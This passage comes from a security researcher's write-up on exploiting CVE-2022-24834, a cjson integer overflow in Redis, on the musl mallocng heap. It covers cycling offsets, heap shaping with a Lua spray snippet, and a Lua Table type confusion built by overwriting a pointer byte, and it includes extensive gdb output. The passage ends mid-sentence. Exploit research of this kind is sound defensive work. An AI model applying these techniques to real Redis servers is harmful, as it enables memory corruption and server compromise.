2 0x30 14 0x190 26 0xcc0 38 0x6650
3 0x40 15 0x1f0 27 0xff0 39 0x7ff0
4 0x50 16 0x240 28 0x1240 40 0x9240
5 0x60 17 0x2a0 29 0x1540 41 0xaaa0
6 0x70 18 0x320 30 0x1990 42 0xccc0
7 0x80 19 0x3f0 31 0x1ff0 43 0xfff0
8 0x90 20 0x480 32 0x2480 44 0x12480
9 0xa0 21 0x540 33 0x2aa0 45 0x15540
10 0xc0 22 0x660 34 0x3320 46 0x19980
11 0xf0 23 0x7f0 35 0x3ff0 47 0x1fff0

Using a cycling offset requires an additional 4-byte in-band header
and also increases by UNIT-sized (16-byte) increments. As
such, I think it’s unlikely for strides <= 0xf0 to have the cycling
offset applied (though I haven’t tested each). There might be some
exceptions, like if sometimes smaller allocations are placed into larger
strides rather than always allocating a new group, but I’m not sure if
that’s possible as I haven’t spent enough time studying the allocator
yet.

In light of this understanding, for the sake of demonstrating when
cycling offsets are used, we’ll look at the 0x140 stride. I allocate a
few tables, fill their arrays such that the resulting sizes are ~0x100
bytes.

I use Lua to leak the address of an outer table. Then in gdb I
analyze the array of all the tables it references, which should be of
increasing size. Let’s look at the first inner table’s array first:

pwndbg> p/x *(Table *)  0x7ffff7a945b0
$2 = <lua_table> = {
  [1] = (TValue *) 0x7ffff7a99880 <lua_table^> 0x7ffff7a94740,
  [2] = (TValue *) 0x7ffff7a99890 <lua_table^> 0x7ffff7a93d80,
  [3] = (TValue *) 0x7ffff7a998a0 <lua_table^> 0x7ffff7a93e70,
  [4] = (TValue *) 0x7ffff7a998b0 <lua_table^> 0x7ffff7a95040,
  [5] = (TValue *) 0x7ffff7a998c0 <lua_table^> 0x7ffff7a950e0,
...
pwndbg> p/x ((Table *)  0x7ffff7a94740)->array
$4 = 0x7ffff7a94e40
pwndbg> mchunkinfo 0x7ffff7a94e40
============== IN-BAND META ==============
        INDEX : 2
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x29 (group --> 0x7ffff7a94ba0)

================= GROUP ================== (at 0x7ffff7a94ba0)
         meta : 0x555555a69040
   active_idx : 2

================== META ================== (at 0x555555a69040)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a94ba0
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]UU (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a94e30)
      cycling offset : 0x1 (userdata --> 0x7ffff7a94e40)
        nominal size : 0x100
       reserved size : 0x2c
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

The first chunk we see under the == SLOT == head has a
cycling offset of 1. We can see that the slot itself starts at
0x7ffff7a94e30, but the user data does not start at the same address,
but rather 0x10-bytes further. This is due to the cycling offset *
UNIT adjustment. If we quickly look at a Table
(stride 0x50) slot, which is of a size that doesn’t allow enough slack
to use a cycling offset, we can see the difference:

pwndbg> mchunkinfo 0x7ffff7a94740
============== IN-BAND META ==============
        INDEX : 11
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x37 (group --> 0x7ffff7a943c0)

================= GROUP ================== (at 0x7ffff7a943c0)
         meta : 0x555555a68ea0
   active_idx : 11

================== META ================== (at 0x555555a68ea0)
         prev : 0x555555a686f8
         next : 0x555555a68d38
          mem : 0x7ffff7a943c0
     last_idx :
   avail_mask : 0x0   (0b00000000000)
   freed_mask : 0x5ac (0b10110101100)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]FUFFUFUFFUU (from slot 11 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : Do nothing

================== SLOT ================== (at 0x7ffff7a94740)
      cycling offset : 0x0 (userdata --> 0x7ffff7a94740)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

Above, we see the SLOT section indicates a cycling
offset of 0. This will hold true for all Table allocations
in a stride 0x50 group. In this case, the user data starts at the same
location as the slot.

So now let’s look at the second stride 0x140 group’s slot that we
allocated earlier:

pwndbg> p/x ((Table *)  0x7ffff7a93d80)->array
$4 = 0x7ffff7a96ca0
pwndbg> mchunkinfo 0x7ffff7a96ca0
============== IN-BAND META ==============
        INDEX : 1
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x17 (group --> 0x7ffff7a96b20)

================= GROUP ================== (at 0x7ffff7a96b20)
         meta : 0x555555a690e0
   active_idx : 2

================== META ================== (at 0x555555a690e0)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a96b20
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: U[U]U (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a96c70)
      cycling offset : 0x3 (userdata --> 0x7ffff7a96ca0)
        nominal size : 0x100
       reserved size : 0xc
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

This second array has a cycling offset of 3, so it starts 0x30 bytes
further than the start of the slot. Clearly, this slot has been used a
few times already.

The main takeaways here are:

  • For certain allocation sizes, the exact offset of an overflow may be
    unreliable unless you know exactly how many times the slot has been
    allocated.
  • For a scenario like overwriting the LSB of a pointer inside of such
    a group, you could be unable to predict where the resulting pointer will
    point inside of another slot, depending on whether you know how many
    times each slot has been used.

Considering all this in the context of the exploit this article
describes, I think that because we have fine-grained control over all
the allocations performed for our overflow, this mitigation wouldn’t
have stopped us. Even if the structures had been on a ‘stride’ group
that uses the cycling offsets, because we can easily control the number
of times the slots are actually used prior to overflow. That said, since
I originally thought it might be a problem and wanted to understand it,
hopefully the explanation was still interesting.

With that out of the way, let’s look into how to exploit
CVE-2022-24834 on the musl heap.

Exploiting
CVE-2022-24834 on the mallocng heap

To quickly recap the vulnerability, it’s an integer overflow when
calculating the size of a buffer to allocate while doing cjson encoding.
By triggering the overflow, we end up with an undersized buffer that we
can write 0x15555555 bytes to (341 MiB), which may be large enough to
qualify as a “wild copy,” although on a 64-bit target and the amount of
memory on modern systems, it’s not too hard to deal with. Exploitation
requires that the target buffer that we want to corrupt must be adjacent
to the overflown buffer with no unmapped gaps in between, so at a
minimum around 350 MiB.

While exploiting ptmalloc2, Ricerca Security solved this problem by
extending the heap, which is brk()-based, to ensure that
enough space exists. Once the extension occurs, it won’t be shrunk
backward. This makes it easy to ensure no unmapped memory regions exist,
and that the 0x15555555-byte copy won’t hit any invalid memory.

This adjacent memory requirement poses some different problems on the
mallocng heap, which I’ll explain shortly.

After achieving the desired layout, the goal is to overwrite some
target chunk (or slot in our case) with the 0x22 value corresponding to
the ending double quote. In the Ricerca Security write-up, their
diagrams indicated they overwrote the LSB pointer of a
Table->array pointer; however, I believe their exploit
actually overwrites the LSB of a TValue->value pointer,
which exists in a chunk that is pointed to by the
Table->array. I may misunderstand their exploit, but at
any rate, the latter is the approach I used.

To summarize, the goal of the heap shaping is ultimately to ensure
that the allocation associated with a table’s array, which is pointed to
by Table->array, is adjacent to the buffer we overflow
so that we corrupt the TValue.

mallocng Heap Shaping

mallocng requires a different strategy than ptmalloc2, as it does not
use brk(). Rather, it will use mmap() to
allocate groups (below I will assume that the group itself is not a slot
of another group) and populate those groups with various fixed-size
slots. Freeing the group, which may occur if all of the slots in a group
are no longer used, results in memory backing the group to be unmapped
using munmap().

 

This means we must leverage feng shui to have valid in-use
allocations adjacent to each other at the time of the overflow. While
doing this, in order to analyze gaps in the memory space, I wrote a
small gdb utility which I’ll use to show the layout that we are working
with. A slightly modified version of this utility has also now been
added to pwndbg.

First, let’s look at what happens if we trigger the bug and allow the
copy to happen, without first shaping the heap. Note this first example
is showing the entire memory space to give an idea of what it looks
like, but in future output, I will limit what’s shown to more relevant
mappings.

The annotations added to to the mapping output are as follows:

  • ^-- ADJ: <num> indicates a series of adjacent
    memory regions, where <num> is the accumulated
    size
  • !!! GUARD PAGE indicates a series of pages with no
    permissions, which writing to would trigger a fault
  • [00....0] -- GAP: <num> indicates an unmapped
    page between mapped regions of memory, where <num> is
    the size of the gap
   0: 0x555555554000 - 0x5555555bf000    0x6b000 r--p
   2: 0x5555555bf000 - 0x555555751000   0x192000 r-xp
   3: 0x555555751000 - 0x5555557d3000    0x82000 r--p
   4: 0x5555557d3000 - 0x5555557da000     0x7000 r--p
   5: 0x5555557da000 - 0x555555833000    0x59000 rw-p
   6: 0x555555833000 - 0x555555a66000   0x233000 rw-p ^-- ADJ: 0x512000
   7: 0x555555a66000 - 0x555555a67000     0x1000 ---p !!! GUARD PAGE
   7: 0x555555a67000 - 0x555555af7000    0x90000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa2ed09000
   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x24348000
  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000
  13: 0x7ffff4717000 - 0x7ffff4c01000   0x4ea000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x1000
  14: 0x7ffff4c02000 - 0x7ffff4e00000   0x1fe000 rw-p
  15: 0x7ffff4e00000 - 0x7ffff5201000   0x401000 rw-p
  16: 0x7ffff5201000 - 0x7ffff5c00000   0x9ff000 rw-p
  17: 0x7ffff5c00000 - 0x7ffff5e01000   0x201000 rw-p
  18: 0x7ffff5e01000 - 0x7ffff6000000   0x1ff000 rw-p ^-- ADJ: 0x13fe000
  19: 0x7ffff6000000 - 0x7ffff6002000     0x2000 ---p !!! GUARD PAGE
  19: 0x7ffff6002000 - 0x7ffff6404000   0x402000 rw-p
  21: 0x7ffff6404000 - 0x7ffff6600000   0x1fc000 rw-p ^-- ADJ: 0x5fe000
  22: 0x7ffff6600000 - 0x7ffff6602000     0x2000 ---p !!! GUARD PAGE
  22: 0x7ffff6602000 - 0x7ffff6a04000   0x402000 rw-p
  24: 0x7ffff6a04000 - 0x7ffff6a6e000    0x6a000 rw-p
  25: 0x7ffff6a6e000 - 0x7ffff6c00000   0x192000 rw-p ^-- ADJ: 0x5fe000
  26: 0x7ffff6c00000 - 0x7ffff6c02000     0x2000 ---p !!! GUARD PAGE
  26: 0x7ffff6c02000 - 0x7ffff7004000   0x402000 rw-p
  28: 0x7ffff7004000 - 0x7ffff7062000    0x5e000 rw-p
  29: 0x7ffff7062000 - 0x7ffff715c000    0xfa000 rw-p
  30: 0x7ffff715c000 - 0x7ffff71ce000    0x72000 rw-p
  31: 0x7ffff71ce000 - 0x7ffff7200000    0x32000 rw-p
  32: 0x7ffff7200000 - 0x7ffff7a00000   0x800000 rw-p
  33: 0x7ffff7a00000 - 0x7ffff7a6f000    0x6f000 rw-p ^-- ADJ: 0xe6d000
  34: 0x7ffff7a6f000 - 0x7ffff7a71000     0x2000 ---p !!! GUARD PAGE
  34: 0x7ffff7a71000 - 0x7ffff7ac5000    0x54000 rw-p
  36: 0x7ffff7ac5000 - 0x7ffff7b0e000    0x49000 r--p
  37: 0x7ffff7b0e000 - 0x7ffff7dab000   0x29d000 r-xp
  38: 0x7ffff7dab000 - 0x7ffff7e79000    0xce000 r--p
  39: 0x7ffff7e79000 - 0x7ffff7ed2000    0x59000 r--p
  40: 0x7ffff7ed2000 - 0x7ffff7ed5000     0x3000 rw-p
  41: 0x7ffff7ed5000 - 0x7ffff7ed8000     0x3000 rw-p
  42: 0x7ffff7ed8000 - 0x7ffff7ee9000    0x11000 r--p
  43: 0x7ffff7ee9000 - 0x7ffff7f33000    0x4a000 r-xp
  44: 0x7ffff7f33000 - 0x7ffff7f50000    0x1d000 r--p
  45: 0x7ffff7f50000 - 0x7ffff7f5a000     0xa000 r--p
  46: 0x7ffff7f5a000 - 0x7ffff7f5e000     0x4000 rw-p
  47: 0x7ffff7f5e000 - 0x7ffff7f62000     0x4000 r--p
  48: 0x7ffff7f62000 - 0x7ffff7f64000     0x2000 r-xp
  49: 0x7ffff7f64000 - 0x7ffff7f78000    0x14000 r--p
  50: 0x7ffff7f78000 - 0x7ffff7fc4000    0x4c000 r-xp
  51: 0x7ffff7fc4000 - 0x7ffff7ffa000    0x36000 r--p
  52: 0x7ffff7ffa000 - 0x7ffff7ffb000     0x1000 r--p
  53: 0x7ffff7ffb000 - 0x7ffff7ffc000     0x1000 rw-p
  54: 0x7ffff7ffc000 - 0x7ffff7fff000     0x3000 rw-p ^-- ADJ: 0x58e000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7fdf000
  55: 0x7ffffffde000 - 0x7ffffffff000    0x21000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xffff7fffff601000
  56: 0xffffffffff600000 - 0xffffffffff601000     0x1000 --xp

When we crash we see:

Thread 1 "redis-server" received signal SIGSEGV, Segmentation fault.
0x00005555556cd676 in json_append_string ()
(gdb) x/i $pc
=> 0x5555556cd676 <json_append_string+166>:     mov    %al,(%rcx,%rdx,1)
(gdb) info registers rcx rdx
rcx            0x7ffff3749010      140737277890576
rdx            0x14b7ff0           21725168
(gdb) x/x $rcx+$rdx
0x7ffff4c01000: Cannot access memory at address 0x7ffff4c01000

Our destination buffer (the buffer being copied to) was allocated at
0x7ffff3749010 (index 12), and after 0xfc1000 bytes, it
quickly writes into unmapped memory, which correlates to what we just
saw in the gap listing:

  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000

In this particular case, even if this gap didn’t exist, because we
didn’t shape the heap, we will inevitably run into a guard page and fail
anyway.

Similarly to the original exploit, shaping the heap to fill these
gaps is quite easy by just allocating lots of tables that point to
unique strings or large arrays of floating-point values. During this
process, it’s also useful to pre-allocate lots of other tables that are
used for different purposes, as well as anything else that may otherwise
create unwanted side effects on our well-groomed heap.

Ensuring Correct
Target Table->Array Distance

After solving the previous issue, the next problem is that even if we
fill the gaps, we have to be careful where our target buffer (the one we
want to corrupt) ends up being allocated. We need to take into account
that the large allocations for the source buffer (the one we copy our
controlled data from) might also be mapped at lower addresses in memory
than the target buffer, which might not be ideal. From the large gap map
listing above, we can see some large allocations at index 9 and 11,
which are related to generating a string large enough for the source
buffer to actually trigger the integer overflow.

   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p

Both the 9 and 11 mappings are roughly as big or larger than the
amount of memory that will actually be writing during our overflow, so
if our cjson buffer ends up being mapped before one of these maps, the
overflow will finish inside of the large string map and thus be useless.
Although in the case above our destination buffer (index 12) was
allocated later in memory than 9 and 11 and so won’t overflow into them,
in practice after doing heap shaping to fill all the gaps, this won’t
necessarily be the case.

This is an example of what that non-ideal scenario might look
like:

 

To resolve this, we must first shape the heap so that the target slot
we want to corrupt is actually mapped with an address lower than the
large mappings used for the source string. In this way, we can ensure
that our destination buffer ends up being directly before the target,
with only the exact amount of distance we need in between. To ensure
that our target slot gets allocated where we want, it needs to be large
enough to be in a single-slot group.

In order to ensure that our target buffer slot’s group gets allocated
after the aforementioned large strings, we can abuse the fact that we
can leak table addresses using Lua. By knowing the approximate size of
the large maps, we can predict when our target buffer would be mapped at
a lower address in memory and avoid it. By continuously allocating large
tables and leaking table addresses, we can work through relatively
adjacent mappings and eventually get an address that suddenly skips a
significantly sized gap, correlating to the large string allocations we
want to avoid. After this point, we can safely allocate the target
buffer we want to corrupt, followed by approximately 0x15556000 bytes of
filler memory, and then finally the destination buffer of the vulnerable
copy that we will overflow. Just a reminder, this order is in reverse of
what you might normally expect because each group is mmap()’ed at lower
addresses, but we overflow towards larger addresses.

The filler memory must still be adjacently mapped so that the copy
from the vulnerable cjson buffer to the target slot won’t encounter any
gaps. mallocng uses specific size thresholds for allocations that
determine the group they fit in. Each stride up to a maximum threshold
has an associated ‘sizeclass’. There are 48 sizeclasses. Anything above
the MMAP_THRESHOLD (0x1FFEC) will fall into a ‘special’
sizeclass 63. In these cases, it will map a single-slot group just for
that single allocation only. We can utilize this to trigger large
allocations that we know will be of a fixed size, with fixed contents,
and won’t be used by any other code. I chose to use mappings of size
0x101000, as I found they were consistently mapped adjacent to each
other by mmap(), as sizes too large or too small seemed to
occasionally create unwanted gaps.

To actually trigger the large allocations, I create a Lua table of
floating pointer numbers. The array contains TValue
structures with inline numeric values. Therefore, we just need to create
a table with an array big enough to cause the 0x101000 map (keeping in
mind the in-band metadata, which will add overhead). I do something like
this:

-- pre-allocate tables
for i = 1, math.floor(0x15560000 / 0x101000) + 1 do
    spray_pages[i] = {}
end
...
-- trigger the 0x101000-byte mappings
for i = 1, #spray_pages do
    for j = 1, 0xD000 do
        spray_pages[i][j] = 0x41414141
    end
end

I used the gap mapping script to confirm this behavior while
debugging and eventually ended up with something like this, where each
new table allocation ends up with a new array mapping like this:

   7: 0x555555a67000 - 0x5555564a1000   0xa3a000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa4439c000
   9: 0x7fff9a83d000 - 0x7fff9a93e000   0x101000 rw-p
  10: 0x7fff9a93e000 - 0x7fff9aa3f000   0x101000 rw-p
  11: 0x7fff9aa3f000 - 0x7fff9ab40000   0x101000 rw-p
  12: 0x7fff9ab40000 - 0x7fff9ac41000   0x101000 rw-p
  13: 0x7fff9ac41000 - 0x7fff9ad42000   0x101000 rw-p
  ...
 350: 0x7fffafe92000 - 0x7fffb0093000   0x201000 rw-p
 351: 0x7fffb0093000 - 0x7fffd00a4000 0x20011000 rw-p
 352: 0x7fffd00a4000 - 0x7fffd80a5000  0x8001000 rw-p ^-- ADJ: 0x3d868000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2000
...

So the layout will ultimately look something like:

 

In the diagram above, the “source string slot” is the buffer from
which we copy our controlled data. The “cjson overflow slot” is the
vulnerable destination buffer that we overflow due to the integer
overflow, and the “target slot” is the victim buffer that we will
corrupt with our 0x22 byte.

There is one more thing which is that the exact offset of the
overflow may change by a small amount if the Lua script changes, or if
there are other side effects on the heap. This seems due to allocations
being made on the index 350 mapping above, before our actual target
buffer. I didn’t investigate this a lot, but it is likely solvable to
get rid of the indeterminism entirely. I chose to work around it by
using a slightly smaller offset, and repeatedly triggering the overflow
and increasing the length. The main caveat of multiple attempts is that
due to corruption of legitimate chunks we have to avoid the garbage
collector firing. Also, Lua has read-only strings, so each string being
allocated needs to be unique, so for each attempt that we make, it will
consume a few hundred MB of memory. In the event that our offset is too
far away, we may well exhaust the memory of the target before we
succeed. In practice, this isn’t a big issue, as once the exploit is
stable and the code isn’t changing, this offset won’t change.

Successful brute force applied to the previous example looks
something like this:

 

Lua Table Confusion

With that out of the way, we can get to the more interesting part. As
noted, we corrupt the LSB of a TValue structure such that
TValue->value points outside its original slot
boundaries. This leads to a sort of type confusion, where we can point
it into a different slot with data we control.

The corrupted array is like so:

 

While targeting ptmalloc2, the Ricera Security researchers showed
that it’s possible to modify a TValue that originally
pointed to a Table, and change its pointer such that it
points to a controlled part of a TString chunk, which
contains a fake Table structure. This can then be used to
kick off a read/write primitive. We can do something similar on
mallocng; however, we have much more strict limitations because the
group holding the Table structure referenced by our
corrupted TValue only contains other fixed-size slots, so
we will only be able to adjust the offset to point to these. Let’s take
a look at these constraints.

Because of the fixed-size slots, our “confused” table will overlap
with two 0x50-byte slots. Depending on the TValue address
being corrupted, it may still partially overlap with itself (as this
graphic shows):

 

A Lua string is made up of a structure called TString,
which is 0x18 bytes. It is immediately followed by the actual
user-controlled string data. This means that if we want to place a Lua
string into a group holding a Table, we will be limited by
how many bytes we actually control.

(gdb) ptype /ox TString
type = struct TString {
/* 0x0000      |  0x0008 */        GCObject *next;
/* 0x0008      |  0x0001 */        lu_byte tt;
/* 0x0009      |  0x0001 */        lu_byte marked;
/* 0x000a      |  0x0001 */        lu_byte reserved;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */        unsigned int hash;
/* 0x0010      |  0x0008 */        size_t len;

/* total size (bytes):   0x18 */
}

A Table is 0x48 bytes and is placed on a 0x50-stride
group. This means that only the last 0x30 bytes of a string can be used
to fully control the Table contents, assuming a direct
overlap.

(gdb) ptype /ox Table
type = struct Table {
/* 0x0000      |  0x0008 */    GCObject *next;
/* 0x0008      |  0x0001 */    lu_byte tt;
/* 0x0009      |  0x0001 */    lu_byte marked;
/* 0x000a      |  0x0001 */    lu_byte flags;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */    int readonly;
/* 0x0010      |  0x0001 */    lu_byte lsizenode;
/* XXX  7-byte hole      */
/* 0x0018      |  0x0008 */    struct Table *metatable;
/* 0x0020      |  0x0008 */    TValue *array;
/* 0x0028      |  0x0008 */    Node *node;
/* 0x0030      |  0x0008 */    Node *lastfree;
/* 0x0038      |  0x0008 */    GCObject *gclist;
/* 0x0040      |  0x0004 */    int sizearray;
/* XXX  4-byte padding   */

/* total size (bytes):   0x48 */
}

In practice, because we are dealing with a misaligned overlap, we can
still leverage all of the user-controlled TString data. As
previously mentioned, we don’t control the exact offset into the
TString we end up using. We are restricted by the fact that
the value written is 0x22. As it turns out, it’s still possible to make
it work, but it’s a little bit finicky.

To solve this problem, we need to figure out what the ideal
overlapping offset into a TString would be, such that we
fully control Table->array in our confused table. Even
if we control this array member though, we still need to
see what side effects exist and how they affect the other
Table fields. If some uncontrolled data pollutes a field in
a particular way, it could mean we can’t actually abuse the
array field.

Let’s look at the offsets of our slots inside the fixed-sized group.
If we know the address of a table from which we can start:

(gdb) p/x *(Table *) 0x7ffff7a5fa30
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffafe92650 <lua_table^> 0x7ffff497cac0,
  [2] = (TValue *) 0x7fffafe92660 <lua_table^> 0x7ffff7a5fad0,
  [3] = (TValue *) 0x7fffafe92670 <lua_table^> 0x7ffff7a5fb20,
  ...

Here we have a table at 0x7ffff7a5fa30, whose
array value contains a bunch of other tables. We want to,
however, analyze the 0x50-stride group that this table is on, as well as
the other slots in this group.

We can use mchunkinfo from the muslheap library to take a
look at the associated slot group.

(gdb) mchunkinfo 0x7ffff7a5fa30
============== IN-BAND META ==============
        INDEX : 8
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x28 (group --> 0x7ffff7a5f7a0)

================= GROUP ================== (at 0x7ffff7a5f7a0)
         meta : 0x555555aefc48
   active_idx : 24

================== META ================== (at 0x555555aefc48)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a5f7a0
     last_idx : 24
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x232d7200e6a00d1e
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: UUUUUUUUUUUUUUUU[U]UUUUUUUU (from slot 24 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[4])

================== SLOT ================== (at 0x7ffff7a5fa30)
      cycling offset : 0x0 (userdata --> 0x7ffff7a5fa30)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

We can confirm that the stride is 0x50, and the slot size is 0x48.
The Slot status map shows that this group is full, and our
slot is at index 8 (designated by [U] and indexed in
reverse order). Also, the cycling offset is 0, which means
that the userdata associated with the slot actually starts at the
beginning of the slot. As we saw earlier, this will be very useful to
us, as we will rely on predictable relative offsets between slots in the
group.

What we are most interested in is how overwriting the LSB of a slot
at a specific offset in this group will influence what we control during
the type confusion. I’ll use an example to make it clearer. Let’s print
out all the offsets of all the slots in this group:

 0: 0x7ffff7a5f7a0
 1: 0x7ffff7a5f7f0
 2: 0x7ffff7a5f840
 3: 0x7ffff7a5f890
 4: 0x7ffff7a5f8e0
 5: 0x7ffff7a5f930
 6: 0x7ffff7a5f980
 7: 0x7ffff7a5f9d0
 8: 0x7ffff7a5fa20 (B2)
 9: 0x7ffff7a5fa70
10: 0x7ffff7a5fac0 (B)
11: 0x7ffff7a5fb10 (A), (A2)
12: 0x7ffff7a5fb60
13: 0x7ffff7a5fbb0
14: 0x7ffff7a5fc00
15: 0x7ffff7a5fc50
16: 0x7ffff7a5fca0
17: 0x7ffff7a5fcf0
18: 0x7ffff7a5fd40
19: 0x7ffff7a5fd90
20: 0x7ffff7a5fde0
21: 0x7ffff7a5fe30
22: 0x7ffff7a5fe80
23: 0x7ffff7a5fed0
24: 0x7ffff7a5ff20

Before going further, I want to note that other than the
Table being targeted by the overwrite, these stride 0x50
slots can be TString values that we control, so below if I
say target index N, it means the slot at index N is a
Table, but you can assume that slots adjacent (N-1 and N-2)
to it are controlled TString structures.

Let’s start from the lowest LSB in the list and go until the pattern
repeats. We see at 2, the LSB is 0x40, then the pattern repeats at
offset 18. That means we only need to analyze candidate tables between 2
and 17 to cover all cases. We want to see what will happen if we
overwrite any of these entries with 0x22. Where does it fall within an
earlier slot, and how might that influence what we control? Since when
we trigger this confusion, due to the uncontrolled value 0x22, we are
guaranteed to overlap two different 0x50-byte slots, so we may want to
control them both.

A quick refresh in case you’ve forgotten, remember that we are
corrupting the LSB of a TValue in some table’s
Table->array buffer, and that TValue will
point to one of the slots in a group as we are analyzing.

I’ll choose a bad example of a table to target first. Assume we
decide to corrupt the LSB of index 11 (marked with (A)
above), which is at 0x7ffff7a5fb10. If we corrupt its LSB
with 22, we get a confused table at
0x7ffff7a5fb22 so we end starting the confused table inside
of the associated Table. I’ve indicated this above with
(A2) to show they are roughly at the same location. In this
scenario we don’t control the contents of the (A) table at
all, and thus most of (A2) is not controlled. Only the
0x12 bytes of the slot at index 12, which follows the
confused Table will actually be controlled, so probably not
ideal.

Okay, now we should find a better candidate… something that if we
corrupt it, we can jump back some large distance and overlap at least
one TString structure. I’ll be biased and choose the one
that works, but in practice, some trial and error was required. Let’s
target index 10 (marked with (B)), which is at address
0x7ffff7a5fac0. If we corrupt this, we will point to
0x7ffff7a5fa22 (marked with (B2)). Here
(B) will overlaps with both index 8 and the first two bytes
of 9. In this scenario, index 8 could be a TString, which
we control.

Assuming we have a controlled TString, we can check what
our confused Table will look like. First, this is what the
TString looks like (no misaligned access):

(gdb) p/rx *(TString *) 0x7ffff7a5fa20
$7 = {
  tsv = {
    next = 0x7ffff3fa2460,
    tt = 0x4,
    marked = 0x1,
    reserved = 0x0,
    hash = 0xb94dc111,
    len = 0x32
(gdb) x/50b 0x7ffff7a5fa20+0x18
0x7ffff7a5fa38: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa40: 0x00    0x00    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffff7a5fa48: 0x41    0x41    0x30    0x30    0x30    0x30    0x30    0x30
0x7ffff7a5fa50: 0x30    0x31    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa58: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7ffff7a5fa60: 0x00    0x00    0xff    0xff    0xff    0x7f    0x00    0x00
0x7ffff7a5fa68: 0x00    0x00

We see the TString header values, and then 0x32-bytes of
controlled data. This data I’ve already populated at the right offsets
to demonstrate what values in a confused Table we can
control.

Now let’s look at the confused Table at the misaligned
offset:

(gdb) p/rx *(Table *)  0x7ffff7a5fa22
$5 = {
  next = 0x10400007ffff3fa,
  tt = 0x0,
  marked = 0x0,
  flags = 0x11,
  readonly = 0x32b94d,
  lsizenode = 0x0,
  metatable = 0x0,
  array = 0x4141414141414141,
  node = 0x3130303030303030,
  lastfree = 0x0,
  gclist = 0x0,
  sizearray = 0x7fffffff
}

As would be expected, the uncontrolled parts of TString
are clobbering the fields next through
readonly. But we can easily control the array
and the sizearray fields.

One problem is that the readonly flag is non-zero, which
means even if we get Lua to use this table, we’re not going to be able
to use it for a write primitive. So we will have to work around this
(more on how shortly).

It may also look like we are in trouble because the tt
member is clobbered and no longer is of type LUA_TTABLE.
Fortunately, this isn’t a problem because when accessing numbered index
members inside of a table’s array, Lua will use the type specified by
the TValue pointing at the object to determine its type. It
won’t ever reference the type information inside the object. The type
information inside the object is used specifically by the garbage
collector, which we won’t plan on running. Similarly, the
next pointer is only used by the garbage collector, so it
being invalid is no problem.

We can look at luaH_get() to confirm:

/*
** main search function
*/
const TValue *luaH_get (Table *t, const TValue *key) {
  switch (ttype(key)) {
    case LUA_TNIL: return luaO_nilobject;
    case LUA_TSTRING: return luaH_getstr(t, rawtsvalue(key));
    case LUA_TNUMBER: {
      int k;
      lua_Number n = nvalue(key);
      lua_number2int(k, n);
      if (luai_numeq(cast_num(k), nvalue(key))) /* index is int? */
        return luaH_getnum(t, k);  /* use specialized version */
      /* else go through */
    }
    ...

When looking up a table by index, if the index value is a number, we
